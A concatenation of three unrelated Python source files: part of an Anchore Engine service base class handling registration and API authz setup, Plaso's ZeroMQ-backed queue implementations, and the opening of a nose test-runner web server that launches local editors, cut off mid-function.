logger.exception('cannot get system-user auth credentials - service may not have system level access')
self.global_configuration['system_user_auth'] = (None, None)
gotauth = False
if not gotauth:
raise Exception('service requires system user auth to start')
logger.info('Credential initialization complete')
def bootstrap(self):
self._process_stage_handlers(LifeCycleStages.pre_bootstrap)
self._bootstrap()
self._process_stage_handlers(LifeCycleStages.post_bootstrap)
def _bootstrap(self):
"""
Create and init the service
:return:
"""
# Do monitor-thread bootstraps here
logger.info('Bootstrapping service')
logger.info('Service bootstrap complete')
return True
def register(self):
self._process_stage_handlers(LifeCycleStages.pre_register)
self._register()
self._process_stage_handlers(LifeCycleStages.post_register)
def _register(self):
if not self.is_enabled:
logger.error('Service not enabled in config, not registering service: ' + self.name)
raise Exception('No service enabled, cannot continue bootstrap')
logger.info('Registering service: {}'.format(self.name))
service_template = {
'type': 'anchore',
'base_url': 'N/A',
'status_base_url': 'N/A',
'version': 'v1',
'short_description': ''
}
hstring = 'http'
if 'external_tls' in self.configuration:
if self.configuration.get('external_tls', False):
hstring = 'https'
elif 'ssl_enable' in self.configuration:
if self.configuration.get('ssl_enable', False):
hstring = 'https'
endpoint_hostname = endpoint_port = endpoint_hostport = None
if self.configuration.get('external_hostname', False):
endpoint_hostname = self.configuration.get('external_hostname')
elif self.configuration.get('endpoint_hostname', False):
endpoint_hostname = self.configuration.get('endpoint_hostname')
if self.configuration.get('external_port', False):
endpoint_port = int(self.configuration.get('external_port'))
elif self.configuration.get('port', False):
endpoint_port = int(self.configuration.get('port'))
if endpoint_hostname:
endpoint_hostport = endpoint_hostname
if endpoint_port:
endpoint_hostport = endpoint_hostport + ":" + str(endpoint_port)
if endpoint_hostport:
service_template['base_url'] = "{}://{}".format(hstring, endpoint_hostport)
else:
raise Exception("could not construct service base_url - please check service configuration for hostname/port settings")
try:
service_template['status'] = False
service_template['status_message'] = taskstate.base_state('service_status')
with session_scope() as dbsession:
service_records = db_services.get_byname(self.__service_name__, session=dbsession)
# fail if trying to add a service that must be unique in the system, but one already is registered in DB
if self.__is_unique_service__:
if len(service_records) > 1:
raise Exception('more than one entry for service type (' + str(
self.__service_name__) + ') exists in DB, but service must be unique - manual DB intervention required')
for service_record in service_records:
if service_record and (service_record['hostid'] != self.instance_id):
raise Exception('service type (' + str(self.__service_name__) + ') already exists in system with different host_id - detail: my_host_id=' + str(
self.instance_id) + ' db_host_id=' + str(service_record['hostid']))
# if all checks out, then add/update the registration
ret = db_services.add(self.instance_id, self.__service_name__, service_template, session=dbsession)
try:
my_service_record = {
'hostid': self.instance_id,
'servicename': self.__service_name__,
}
my_service_record.update(service_template)
servicestatus.set_my_service_record(my_service_record)
self.service_record = my_service_record
except Exception as err:
logger.warn('could not set local service information - exception: {}'.format(str(err)))
except Exception as err:
raise err
service_record = servicestatus.get_my_service_record()
servicestatus.set_status(service_record, up=True, available=True, update_db=True)
logger.info('Service registration complete')
return True
def initialize(self, global_configuration, db_connect=True, require_system_user_auth=None):
"""
Service initialization that requires the service config loaded and available but before registration of the service
or db connection and access to service discovery.
:param name: str name of service instance
:param db_connect: override the __db_enabled__ class variable just for this instance. If false, no db init or connect is performed on bootstrap
:param global_configuration: dict of configuration data to use
:return: True on success
"""
self.global_configuration = global_configuration
self.requires_db = db_connect
if require_system_user_auth is not None:
self.require_system_user = require_system_user_auth
logger.debug('Invoking instance-specific handler registration')
self._register_instance_handlers()
self.configure()
self.db_connect()
self.credential_init()
self.bootstrap()
self.register()
return True
def get_monitor_thread(self, monitor_thread_wrapper=None):
"""
Start the service and return a thread to execute the monitor. Caller must actually start the monitor thread for this service.
:param monitor_thread_wrapper: function that takes the target function and **kwargs as arguments and returns an object expected by the caller
:return:
"""
if self.task_handlers_enabled:
if monitor_thread_wrapper:
t = monitor_thread_wrapper(self.monitor_fn, **self.monitor_kwargs)
else:
t = threading.Thread(target=self.monitor_fn, kwargs=self.monitor_kwargs)
return t
else:
return None
class ApiService(BaseService):
"""
A service that provides an api
"""
__spec_dir__ = 'swagger'
__spec_file__ = 'swagger.yaml'
__service_api_version__ = 'v1'
def __init__(self, options=None):
super().__init__(options=options)
self._api_application = None
self.yosai = None
def _register_instance_handlers(self):
super()._register_instance_handlers()
logger.info('Registering api handlers')
self.register_handler(LifeCycleStages.pre_bootstrap, self.initialize_api, None)
def _init_wsgi_app(self, service_name, api_spec_dir=None, api_spec_file=None):
"""
Return an initialized service with common api resource and auth config
:return:
"""
try:
self._application = connexion.FlaskApp(__name__, specification_dir=api_spec_dir)
flask_app = self._application.app
flask_app.url_map.strict_slashes = False
# Ensure jsonify() calls add whitespace for nice error responses
flask_app.config['JSONIFY_PRETTYPRINT_REGULAR'] = True
# Suppress some verbose logs in dependencies
import logging as py_logging
py_logging.basicConfig(level=py_logging.ERROR)
# Initialize the authentication system
self.init_auth()
flask_app.before_request(self._inject_service)
flask_app.register_error_handler(AnchoreApiError, handle_api_exception)
metrics.init_flask_metrics(flask_app, servicename=service_name)
self._application.add_api(Path(api_spec_file), validate_responses=self.options.get('validate-responses'))
return self._application
except Exception as err:
traceback.print_exc()
raise err
def init_auth(self):
"""
Initializes the authentication subsystem as needed
:return:
"""
# Initialize the wrapper
init_authz_handler(configuration=self.configuration)
def _inject_service(self):
"""
Adds a reference to the service object into the request's app context
:return:
"""
g.service = self
def initialize_api(self):
"""
Initialize the api and return the wsgi application object
:return:
"""
logger.info('Initializing API from: {}/{}'.format(self.__spec_dir__, self.__spec_file__))
if self.configuration['listen'] and self.configuration['port'] and self.configuration['endpoint_hostname']:
if not self._api_application:
self._api_application = self._init_wsgi_app(self.__service_name__, self.__spec_dir__, self.__spec_file__)
def get_api_application(self):
if self._api_application is None:
raise Exception('API not initialized yet. Must initialize the service or call initialize_api() before the application is available')
return self._api_application.app
@staticmethod
def build_authz_heartbeat(service_name):
"""
Returns the handler function itself (uses closure to pass some values in
:return:
"""
def authz_heartbeat(*args, **kwargs):
cycle_timer = kwargs['mythread']['cycle_timer']
logger.info('Checking authz availability')
try:
host_id = localconfig.get_host_id()
authz_handlr = get_authorizer()
handler = authz_handlr.__class__.__name__
ex = None
try:
result = authz_handlr.healthcheck()
except Exception as e:
ex = e
result = False
if not result:
fail_event = ServiceAuthzPluginHealthCheckFail(user_id=localconfig.ADMIN_ACCOUNT_NAME,
name=service_name,
host=host_id,
plugin=handler,
details=str(ex)
)
logger.info('Sending healthcheck failure event: {}'.format(fail_event.__event_type__))
try:
client = internal_client_for(CatalogClient, localconfig.ADMIN_ACCOUNT_NAME)
client.add_event(fail_event)
except Exception as ex:
logger.exception(
'Failure to send authz healthcheck failure event: {}'.format(fail_event.to_json()))
except Exception as e:
logger.exception('Caught unexpected exception from the authz heartbeat handler')
time.sleep(cycle_timer)
return True
return authz_heartbeat
class UserFacingApiService(ApiService):
def __init__(self, options=None):
super().__init__(options)
self._authz_actions = {}
self.api_spec = None
def _register_instance_handlers(self):
super()._register_instance_handlers()
self.register_handler(LifeCycleStages.pre_bootstrap, self._process_api_spec, None)
@staticmethod
def parse_swagger(path):
with open(path) as f:
if path.endswith('yaml') or path.endswith('yml'):
return yaml.load(f)
else:
return json.load(f)
@staticmethod
def build_action_map(swagger_content):
"""
Given a dict from the swagger spec (must be fully materialized, no external refs), determine the mapping
of a operation to an action using x-anchore-action labels in the swagger.
This relies on using connexion such that the x-swagger-router-controller + operationId define the key as is implemented
in connexion. The resulting dict maps a fully-qualified function to an action
:param swagger_content: dict
:return: dict function_name -> action (e.g. anchore_engine.services.apiext.images.list_images -> listImages)
"""
action_map = {}
for path in swagger_content.get('paths').values():
for verb in path.values():
action = verb.get('x-anchore-authz-action')
controller = verb.get('x-swagger-router-controller')
operationId = verb.get('operationId')
action_map[controller + '.' + operationId] = action
return action_map
def _process_api_spec(self):
try:
self.api_spec = UserFacingApiService.parse_swagger(os.path.join(self.__spec_dir__, self.__spec_file__))
actions = UserFacingApiService.build_action_map(self.api_spec)
missing = [x for x in filter(lambda x: x[1] is None, actions.items())]
if missing:
raise Exception('API Spec validation error: All operations must have a x-anchore-authz-action label. Missing for: {}'.format(missing))
else:
self._authz_actions = actions
except Exception as ex:
logger.exception('Error loading swagger spec for authz action parsing. Cannot proceed')
raise ex
def action_for_operation(self, fq_operation_id):
"""
Raises KeyError if id not found
:param fq_operation_id:
:return:
"""
return self._authz_actions[fq_operation_id]
|
zeromq_queue.py
|
# -*- coding: utf-8 -*-
"""ZeroMQ implementations of the Plaso queue interface."""
import abc
import errno
import threading
import time
# The 'Queue' module was renamed to 'queue' in Python 3
try:
import Queue # pylint: disable=import-error
except ImportError:
import queue as Queue # pylint: disable=import-error
import zmq
from plaso.engine import logger
from plaso.lib import errors
from plaso.multi_process import plaso_queue
# pylint: disable=no-member
class ZeroMQQueue(plaso_queue.Queue):
"""Interface for a ZeroMQ backed queue.
Attributes:
name (str): name to identify the queue.
port (int): TCP port that the queue is connected or bound to. If the queue
is not yet bound or connected to a port, this value will be None.
timeout_seconds (int): number of seconds that calls to PopItem and PushItem
may block for, before returning queue.QueueEmpty.
"""
_SOCKET_ADDRESS = 'tcp://127.0.0.1'
_SOCKET_TYPE = None
_ZMQ_SOCKET_SEND_TIMEOUT_MILLISECONDS = 1500
_ZMQ_SOCKET_RECEIVE_TIMEOUT_MILLISECONDS = 1500
SOCKET_CONNECTION_BIND = 1
SOCKET_CONNECTION_CONNECT = 2
SOCKET_CONNECTION_TYPE = None
def __init__(
self, delay_open=True, linger_seconds=10, maximum_items=1000,
name='Unnamed', port=None, timeout_seconds=5):
"""Initializes a ZeroMQ backed queue.
Args:
delay_open (Optional[bool]): whether a ZeroMQ socket should be created
the first time the queue is pushed to or popped from, rather than at
queue object initialization. This is useful if a queue needs to be
passed to a child process from a parent process.
linger_seconds (Optional[int]): number of seconds that the underlying
ZeroMQ socket can remain open after the queue has been closed,
to allow queued items to be transferred to other ZeroMQ sockets.
maximum_items (Optional[int]): maximum number of items to queue on the
ZeroMQ socket. ZeroMQ refers to this value as "high water mark" or
"hwm". Note that this limit only applies at one "end" of the queue.
The default of 1000 is the ZeroMQ default value.
name (Optional[str]): Optional name to identify the queue.
port (Optional[int]): The TCP port to use for the queue. The default is
None, which indicates that the queue should choose a random port to
bind to.
timeout_seconds (Optional[int]): number of seconds that calls to PopItem
and PushItem may block for, before returning queue.QueueEmpty.
Raises:
ValueError: if the queue is configured to connect to an endpoint,
but no port is specified.
"""
if (self.SOCKET_CONNECTION_TYPE == self.SOCKET_CONNECTION_CONNECT
and not port):
raise ValueError('No port specified to connect to.')
super(ZeroMQQueue, self).__init__()
self._closed_event = None
self._high_water_mark = maximum_items
self._linger_seconds = linger_seconds
self._terminate_event = None
self._zmq_context = None
self._zmq_socket = None
self.name = name
self.port = port
self.timeout_seconds = timeout_seconds
if not delay_open:
self._CreateZMQSocket()
def _SendItem(self, zmq_socket, item, block=True):
"""Attempts to send an item to a ZeroMQ socket.
Args:
zmq_socket (zmq.Socket): used to the send the item.
item (object): sent on the queue. Will be pickled prior to sending.
block (Optional[bool]): whether the push should be performed in blocking
or non-blocking mode.
Returns:
bool: whether the item was sent successfully.
"""
try:
logger.debug('{0:s} sending item'.format(self.name))
if block:
zmq_socket.send_pyobj(item)
else:
zmq_socket.send_pyobj(item, zmq.DONTWAIT)
logger.debug('{0:s} sent item'.format(self.name))
return True
except zmq.error.Again:
logger.debug('{0:s} could not send an item'.format(self.name))
except zmq.error.ZMQError as exception:
if exception.errno == errno.EINTR:
logger.error(
'ZMQ syscall interrupted in {0:s}.'.format(
self.name))
return False
def _ReceiveItemOnActivity(self, zmq_socket):
"""Attempts to receive an item from a ZeroMQ socket.
Args:
zmq_socket (zmq.Socket): used to the receive the item.
Returns:
object: item from the socket.
Raises:
QueueEmpty: if no item could be received within the timeout.
zmq.error.ZMQError: if an error occurs in ZeroMQ
"""
events = zmq_socket.poll(
self._ZMQ_SOCKET_RECEIVE_TIMEOUT_MILLISECONDS)
if events:
try:
received_object = self._zmq_socket.recv_pyobj()
return received_object
except zmq.error.Again:
logger.error(
'{0:s}. Failed to receive item in time.'.format(
self.name))
raise
except zmq.error.ZMQError as exception:
if exception.errno == errno.EINTR:
logger.error(
'ZMQ syscall interrupted in {0:s}. Queue aborting.'.format(
self.name))
raise
raise errors.QueueEmpty
def _SetSocketTimeouts(self):
"""Sets the timeouts for socket send and receive."""
# Note that timeout must be an integer value. If timeout is a float
# it appears that zmq will not enforce the timeout.
timeout = int(self.timeout_seconds * 1000)
receive_timeout = min(
self._ZMQ_SOCKET_RECEIVE_TIMEOUT_MILLISECONDS, timeout)
send_timeout = min(self._ZMQ_SOCKET_SEND_TIMEOUT_MILLISECONDS, timeout)
self._zmq_socket.setsockopt(zmq.RCVTIMEO, receive_timeout)
self._zmq_socket.setsockopt(zmq.SNDTIMEO, send_timeout)
def _SetSocketHighWaterMark(self):
"""Sets the high water mark for the socket.
This number is the maximum number of items that will be queued in the socket
on this end of the queue.
"""
self._zmq_socket.hwm = self._high_water_mark
def _CreateZMQSocket(self):
"""Creates a ZeroMQ socket."""
logger.debug('Creating socket for {0:s}'.format(self.name))
if not self._zmq_context:
self._zmq_context = zmq.Context()
# The terminate and close threading events need to be created when the
# socket is opened. Threading events are unpickleable objects and cannot
# passed in multiprocessing on Windows.
if not self._terminate_event:
self._terminate_event = threading.Event()
if not self._closed_event:
self._closed_event = threading.Event()
if self._zmq_socket:
logger.debug('Closing old socket for {0:s}'.format(self.name))
self._zmq_socket.close()
self._zmq_socket = None
self._zmq_socket = self._zmq_context.socket(self._SOCKET_TYPE)
self._SetSocketTimeouts()
self._SetSocketHighWaterMark()
if self.port:
address = '{0:s}:{1:d}'.format(self._SOCKET_ADDRESS, self.port)
if self.SOCKET_CONNECTION_TYPE == self.SOCKET_CONNECTION_CONNECT:
self._zmq_socket.connect(address)
logger.debug('{0:s} connected to {1:s}'.format(self.name, address))
else:
self._zmq_socket.bind(address)
logger.debug(
'{0:s} bound to specified port {1:s}'.format(self.name, address))
else:
self.port = self._zmq_socket.bind_to_random_port(self._SOCKET_ADDRESS)
logger.debug(
'{0:s} bound to random port {1:d}'.format(self.name, self.port))
def Open(self):
"""Opens this queue, causing the creation of a ZeroMQ socket.
Raises:
QueueAlreadyStarted: if the queue is already started, and a socket already
exists.
"""
if self._zmq_socket:
raise errors.QueueAlreadyStarted()
self._CreateZMQSocket()
def Close(self, abort=False):
"""Closes the queue.
Args:
abort (Optional[bool]): whether the Close is the result of an abort
condition. If True, queue contents may be lost.
Raises:
QueueAlreadyClosed: if the queue is not started, or has already been
closed.
RuntimeError: if closed or terminate event is missing.
"""
if not self._closed_event or not self._terminate_event:
raise RuntimeError('Missing closed or terminate event.')
if not abort and self._closed_event.is_set():
raise errors.QueueAlreadyClosed()
self._closed_event.set()
if abort:
if not self._closed_event.is_set():
logger.warning(
'{0:s} queue aborting. Contents may be lost.'.format(self.name))
self._linger_seconds = 0
# We can't determine whether a there might be an operation being performed
# on the socket in a separate method or thread, so we'll signal that any
# such operation should cease.
self._terminate_event.set()
else:
logger.debug(
'{0:s} queue closing, will linger for up to {1:d} seconds'.format(
self.name, self._linger_seconds))
def IsBound(self):
"""Checks if the queue is bound to a port."""
return (self.SOCKET_CONNECTION_TYPE == self.SOCKET_CONNECTION_BIND and
self.port is not None)
def IsConnected(self):
"""Checks if the queue is connected to a port."""
return (self.SOCKET_CONNECTION_TYPE == self.SOCKET_CONNECTION_CONNECT and
self.port is not None)
def IsEmpty(self):
"""Checks if the queue is empty.
ZeroMQ queues don't have a concept of "empty" - there could always be
messages on the queue that a producer or consumer is unaware of. Thus,
the queue is never empty, so we return False. Note that it is possible that
a queue is unable to pop an item from a queue within a timeout, which will
cause PopItem to raise a QueueEmpty exception, but this is a different
condition.
Returns:
bool: False, to indicate the the queue isn't empty.
"""
return False
@abc.abstractmethod
def PushItem(self, item, block=True):
"""Pushes an item on to the queue.
Args:
item (object): item to push on the queue.
block (Optional[bool]): whether the push should be performed in blocking
or non-blocking mode.
Raises:
QueueAlreadyClosed: if the queue is closed.
"""
# pylint: disable=redundant-returns-doc
@abc.abstractmethod
def PopItem(self):
"""Pops an item off the queue.
Returns:
object: item from the queue.
Raises:
QueueEmpty: if the queue is empty, and no item could be popped within the
queue timeout.
"""
class ZeroMQPullQueue(ZeroMQQueue):
"""Parent class for Plaso queues backed by ZeroMQ PULL sockets.
This class should not be instantiated directly, a subclass should be
instantiated instead.
Instances of this class or subclasses may only be used to pop items, not to
push.
"""
_SOCKET_TYPE = zmq.PULL
def PopItem(self):
"""Pops an item off the queue.
If no ZeroMQ socket has been created, one will be created the first
time this method is called.
Returns:
object: item from the queue.
Raises:
KeyboardInterrupt: if the process is sent a KeyboardInterrupt while
popping an item.
QueueEmpty: if the queue is empty, and no item could be popped within the
queue timeout.
RuntimeError: if closed or terminate event is missing.
zmq.error.ZMQError: if a ZeroMQ error occurs.
"""
if not self._zmq_socket:
self._CreateZMQSocket()
if not self._closed_event or not self._terminate_event:
raise RuntimeError('Missing closed or terminate event.')
logger.debug(
'Pop on {0:s} queue, port {1:d}'.format(self.name, self.port))
last_retry_timestamp = time.time() + self.timeout_seconds
while not self._closed_event.is_set() or not self._terminate_event.is_set():
try:
return self._ReceiveItemOnActivity(self._zmq_socket)
except errors.QueueEmpty:
if time.time() > last_retry_timestamp:
raise
except KeyboardInterrupt:
self.Close(abort=True)
raise
def PushItem(self, item, block=True):
"""Pushes an item on to the queue.
Provided for compatibility with the API, but doesn't actually work.
Args:
item (object): item to push on the queue.
block (Optional[bool]): whether the push should be performed in blocking
or non-blocking mode.
Raises:
WrongQueueType: As Push is not supported this queue.
"""
raise errors.WrongQueueType()
class ZeroMQPullConnectQueue(ZeroMQPullQueue):
"""A Plaso queue backed by a ZeroMQ PULL socket that connects to a port.
This queue may only be used to pop items, not to push.
"""
SOCKET_CONNECTION_TYPE = ZeroMQQueue.SOCKET_CONNECTION_CONNECT
class ZeroMQPushQueue(ZeroMQQueue):
"""Parent class for Plaso queues backed by ZeroMQ PUSH sockets.
This class should not be instantiated directly, a subclass should be
instantiated instead.
Instances of this class or subclasses may only be used to push items, not to
pop.
"""
_SOCKET_TYPE = zmq.PUSH
def PopItem(self):
"""Pops an item of the queue.
Provided for compatibility with the API, but doesn't actually work.
Raises:
WrongQueueType: As Pull is not supported this queue.
"""
raise errors.WrongQueueType()
def PushItem(self, item, block=True):
"""Push an item on to the queue.
If no ZeroMQ socket has been created, one will be created the first time
this method is called.
Args:
item (object): item to push on the queue.
block (Optional[bool]): whether the push should be performed in blocking
or non-blocking mode.
Raises:
KeyboardInterrupt: if the process is sent a KeyboardInterrupt while
pushing an item.
QueueFull: if it was not possible to push the item to the queue
within the timeout.
RuntimeError: if terminate event is missing.
zmq.error.ZMQError: if a ZeroMQ specific error occurs.
"""
if not self._zmq_socket:
self._CreateZMQSocket()
if not self._terminate_event:
raise RuntimeError('Missing terminate event.')
logger.debug(
'Push on {0:s} queue, port {1:d}'.format(self.name, self.port))
last_retry_timestamp = time.time() + self.timeout_seconds
while not self._terminate_event.is_set():
try:
send_successful = self._SendItem(self._zmq_socket, item, block)
if send_successful:
break
if time.time() > last_retry_timestamp:
logger.error('{0:s} unable to push item, raising.'.format(
self.name))
raise errors.QueueFull
except KeyboardInterrupt:
self.Close(abort=True)
raise
class ZeroMQPushBindQueue(ZeroMQPushQueue):
"""A Plaso queue backed by a ZeroMQ PUSH socket that binds to a port.
This queue may only be used to push items, not to pop.
"""
SOCKET_CONNECTION_TYPE = ZeroMQQueue.SOCKET_CONNECTION_BIND
class ZeroMQRequestQueue(ZeroMQQueue):
"""Parent class for Plaso queues backed by ZeroMQ REQ sockets.
This class should not be instantiated directly, a subclass should be
instantiated instead.
Instances of this class or subclasses may only be used to pop items, not to
push.
"""
_SOCKET_TYPE = zmq.REQ
def PopItem(self):
"""Pops an item off the queue.
If no ZeroMQ socket has been created, one will be created the first
time this method is called.
Returns:
object: item from the queue.
Raises:
KeyboardInterrupt: if the process is sent a KeyboardInterrupt while
popping an item.
QueueEmpty: if the queue is empty, and no item could be popped within the
queue timeout.
RuntimeError: if terminate event is missing.
zmq.error.ZMQError: if an error occurs in ZeroMQ.
"""
if not self._zmq_socket:
self._CreateZMQSocket()
if not self._terminate_event:
raise RuntimeError('Missing terminate event.')
logger.debug('Pop on {0:s} queue, port {1:d}'.format(
self.name, self.port))
last_retry_time = time.time() + self.timeout_seconds
while not self._terminate_event.is_set():
try:
self._zmq_socket.send_pyobj(None)
break
except zmq.error.Again:
# The existing socket is now out of sync, so we need to open a new one.
self._CreateZMQSocket()
if time.time() > last_retry_time:
logger.warning('{0:s} timeout requesting item'.format(self.name))
raise errors.QueueEmpty
continue
while not self._terminate_event.is_set():
try:
return self._ReceiveItemOnActivity(self._zmq_socket)
except errors.QueueEmpty:
continue
except KeyboardInterrupt:
self.Close(abort=True)
raise
def PushItem(self, item, block=True):
"""Pushes an item on to the queue.
Provided for compatibility with the API, but doesn't actually work.
Args:
item (object): item to push on the queue.
block (Optional[bool]): whether the push should be performed in blocking
or non-blocking mode.
Raises:
WrongQueueType: As Push is not supported this queue.
"""
raise errors.WrongQueueType
class ZeroMQRequestConnectQueue(ZeroMQRequestQueue):
"""A Plaso queue backed by a ZeroMQ REQ socket that connects to a port.
This queue may only be used to pop items, not to push.
"""
SOCKET_CONNECTION_TYPE = ZeroMQQueue.SOCKET_CONNECTION_CONNECT
class ZeroMQBufferedQueue(ZeroMQQueue):
"""Parent class for buffered Plaso queues.
Buffered queues use a regular Python queue to store items that are pushed or
popped from the queue without blocking on underlying ZeroMQ operations.
This class should not be instantiated directly, a subclass should be
instantiated instead.
"""
def __init__(
self, buffer_timeout_seconds=2, buffer_max_size=10000, delay_open=True,
linger_seconds=10, maximum_items=1000, name='Unnamed', port=None,
timeout_seconds=5):
"""Initializes a buffered, ZeroMQ backed queue.
Args:
buffer_max_size (Optional[int]): maximum number of items to store in
the buffer, before or after they are sent/received via ZeroMQ.
buffer_timeout_seconds(Optional[int]): number of seconds to wait when
doing a put or get to/from the internal buffer.
delay_open (Optional[bool]): whether a ZeroMQ socket should be created
the first time the queue is pushed to or popped from, rather than at
queue object initialization. This is useful if a queue needs to be
passed to a child process from a parent process.
linger_seconds (Optional[int]): number of seconds that the underlying
ZeroMQ socket can remain open after the queue object has been closed,
to allow queued items to be transferred to other ZeroMQ sockets.
maximum_items (Optional[int]): maximum number of items to queue on the
ZeroMQ socket. ZeroMQ refers to this value as "high water mark" or
"hwm". Note that this limit only applies at one "end" of the queue.
The default of 1000 is the ZeroMQ default value.
name (Optional[str]): name to identify the queue.
port (Optional[int]): The TCP port to use for the queue. None indicates
that the queue should choose a random port to bind to.
timeout_seconds (Optional[int]): number of seconds that calls to PopItem
and PushItem may block for, before returning queue.QueueEmpty.
"""
self._buffer_timeout_seconds = buffer_timeout_seconds
self._queue = Queue.Queue(maxsize=buffer_max_size)
self._zmq_thread = None
# We need to set up the internal buffer queue before we call super, so that
# if the call to super opens the ZMQSocket, the backing thread will work.
super(ZeroMQBufferedQueue, self).__init__(
delay_open=delay_open, linger_seconds=linger_seconds,
maximum_items=maximum_items, name=name, port=port,
timeout_seconds=timeout_seconds)
def _CreateZMQSocket(self):
"""Creates a ZeroMQ socket as well as a regular queue and a thread."""
super(ZeroMQBufferedQueue, self)._CreateZMQSocket()
if not self._zmq_thread:
thread_name = '{0:s}_zmq_responder'.format(self.name)
self._zmq_thread = threading.Thread(
target=self._ZeroMQResponder, args=[self._queue], name=thread_name)
self._zmq_thread.start()
@abc.abstractmethod
def _ZeroMQResponder(self, source_queue):
"""Listens for requests and replies to clients.
Args:
source_queue (Queue.queue): queue to to pull items from.
"""
def Close(self, abort=False):
"""Closes the queue.
Args:
abort (Optional[bool]): whether the Close is the result of an abort
condition. If True, queue contents may be lost.
Raises:
QueueAlreadyClosed: if the queue is not started, or has already been
closed.
RuntimeError: if closed or terminate event is missing.
"""
if not self._closed_event or not self._terminate_event:
raise RuntimeError('Missing closed or terminate event.')
if not abort and self._closed_event.is_set():
raise errors.QueueAlreadyClosed()
self._closed_event.set()
if abort:
if not self._closed_event.is_set():
logger.warning(
'{0:s} queue aborting. Contents may be lost.'.format(self.name))
# We can't determine whether a there might be an operation being performed
# on the socket in a separate method or thread, so we'll signal that any
# such operation should cease.
self._terminate_event.set()
self._linger_seconds = 0
if self._zmq_thread:
logger.debug('[{0:s}] Waiting for thread to exit.'.format(self.name))
self._zmq_thread.join(timeout=self.timeout_seconds)
if self._zmq_thread.is_alive():
logger.error((
'{0:s} ZMQ responder thread did not exit within timeout').format(
self.name))
else:
logger.debug(
'{0:s} queue closing, will linger for up to {1:d} seconds'.format(
self.name, self._linger_seconds))
def Empty(self):
"""Removes all items from the internal buffer."""
try:
while True:
self._queue.get(False)
except Queue.Empty:
pass
class ZeroMQBufferedReplyQueue(ZeroMQBufferedQueue):
"""Parent class for buffered Plaso queues backed by ZeroMQ REP sockets.
This class should not be instantiated directly, a subclass should be
instantiated instead.
Instances of this class or subclasses may only be used to push items, not to
pop.
"""
_ZMQ_SOCKET_RECEIVE_TIMEOUT_MILLISECONDS = 4000
_ZMQ_SOCKET_SEND_TIMEOUT_MILLISECONDS = 2000
_SOCKET_TYPE = zmq.REP
def _ZeroMQResponder(self, source_queue):
"""Listens for requests and replies to clients.
Args:
source_queue (Queue.queue): queue to use to pull items from.
Raises:
RuntimeError: if closed or terminate event is missing.
"""
if not self._closed_event or not self._terminate_event:
raise RuntimeError('Missing closed or terminate event.')
logger.debug('{0:s} responder thread started'.format(self.name))
item = None
while not self._terminate_event.is_set():
if not item:
try:
if self._closed_event.is_set():
item = source_queue.get_nowait()
else:
item = source_queue.get(True, self._buffer_timeout_seconds)
except Queue.Empty:
if self._closed_event.is_set():
break
continue
try:
# We need to receive a request before we can reply with the item.
self._ReceiveItemOnActivity(self._zmq_socket)
except errors.QueueEmpty:
if self._closed_event.is_set() and self._queue.empty():
break
continue
sent_successfully = self._SendItem(self._zmq_socket, item)
item = None
if not sent_successfully:
logger.error('Queue {0:s} unable to send item.'.format(self.name))
break
logger.info('Queue {0:s} responder exiting.'.format(self.name))
self._zmq_socket.close(self._linger_seconds)
def PopItem(self):
"""Pops an item of the queue.
Provided for compatibility with the API, but doesn't actually work.
Raises:
WrongQueueType: As Pop is not supported by this queue.
"""
raise errors.WrongQueueType()
def PushItem(self, item, block=True):
"""Push an item on to the queue.
If no ZeroMQ socket has been created, one will be created the first time
this method is called.
Args:
item (object): item to push on the queue.
block (Optional[bool]): whether the push should be performed in blocking
or non-blocking mode.
Raises:
QueueAlreadyClosed: if the queue is closed.
QueueFull: if the internal buffer was full and it was not possible to
push the item to the buffer within the timeout.
RuntimeError: if closed event is missing.
"""
if not self._closed_event:
raise RuntimeError('Missing closed event.')
if self._closed_event.is_set():
raise errors.QueueAlreadyClosed()
if not self._zmq_socket:
self._CreateZMQSocket()
try:
if block:
self._queue.put(item, timeout=self.timeout_seconds)
else:
self._queue.put(item, block=False)
except Queue.Full as exception:
raise errors.QueueFull(exception)
class ZeroMQBufferedReplyBindQueue(ZeroMQBufferedReplyQueue):
"""A Plaso queue backed by a ZeroMQ REP socket that binds to a port.
This queue may only be used to pop items, not to push.
"""
SOCKET_CONNECTION_TYPE = ZeroMQQueue.SOCKET_CONNECTION_BIND
|
webserver.py
|
import time
import threading
import traceback
import json
import nose
import sys
import linecache
import inspect
import os.path
try: # Python 2
import Queue as queue
import urlparse
from StringIO import StringIO
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
import SocketServer as socketserver
except ImportError: # Python 3
import queue
from urllib import parse as urlparse
from io import StringIO
from http.server import HTTPServer, BaseHTTPRequestHandler
import socketserver
from mpi4py import MPI
from nose.plugins.capture import Capture
from nose.plugins.skip import Skip, SkipTest
from nose.core import TestProgram
from multiprocessing import Process, Queue
from optparse import OptionParser
from subprocess import call, Popen, PIPE
EDITOR = None
osascript_to_open_xcode = """on run argv
set linenumber to (item 1 of argv) as integer
set filename_string to item 2 of argv
set file_to_open to POSIX file filename_string
tell application "Xcode"
activate
set doc_to_edit to (open file_to_open)
tell doc_to_edit
set its selection to item linenumber of paragraph of it
end tell
end tell
end run"""
def open_file(path, lineno = 1):
global EDITOR
if sys.platform == 'darwin':
program = Popen(
['osascript', '-', str(lineno), os.path.join(os.getcwd(), path) ],
stdin = PIPE, stdout = PIPE, stderr = PIPE)
out, err = program.communicate(osascript_to_open_xcode)
else:
possible_programs = (
['geany', path, '+'+str(lineno)],
['kate', '-u', '--line',str(lineno),path],
['emacs', '+'+str(lineno), path],
['nedit-client','-line', str(lineno), path],
)
for program in possible_programs:
if program[0] == EDITOR:
returncode = call(['which', program[0]])
if returncode == 0:
call(program)
return
for program in possible_programs:
returncode = call(['which', program[0]])
if returncode == 0:
call(program)
return
call([EDITOR, path])
class HandleRequest(BaseHTTPRequestHandler):
def do_GET(self):
self.parsed_path = urlparse.urlparse(self.path)
path = self.parsed_path.path[1:]
method_name = 'do_' + path
if hasattr(self, method_name):
method = getattr(self,method_name)
string, content_type = method()
else:
if path.endswith(".js"):
string, content_type = self.javascript_file(path)
else:
string, content_type = self.index_file()
self.send_response(200)
self.send_header("Content-type", content_type)
self.send_header("Content-Length", str(len(string)))
self.end_headers()
self.wfile.write(string)
def do_long_poll(self):
self.send_response(200)
self.send_header("Content-Type", "text/javascript")
self.send_header("Transfer-Encoding", "chunked")
self.send_header("Cache-Control", "no-cache, no-store")
self.send_header("Pragma", "no-cache")
self.end_headers()
while True:
self.server.tests_finished.wait(10.0)
if self.server.tests_finished.is_set():
self.send_chunk('true')
self.server.tests_finished.clear()
else:
self.send_chunk('false')
self.wfile.write('0\r\n\r\n')
self.wfile.flush()
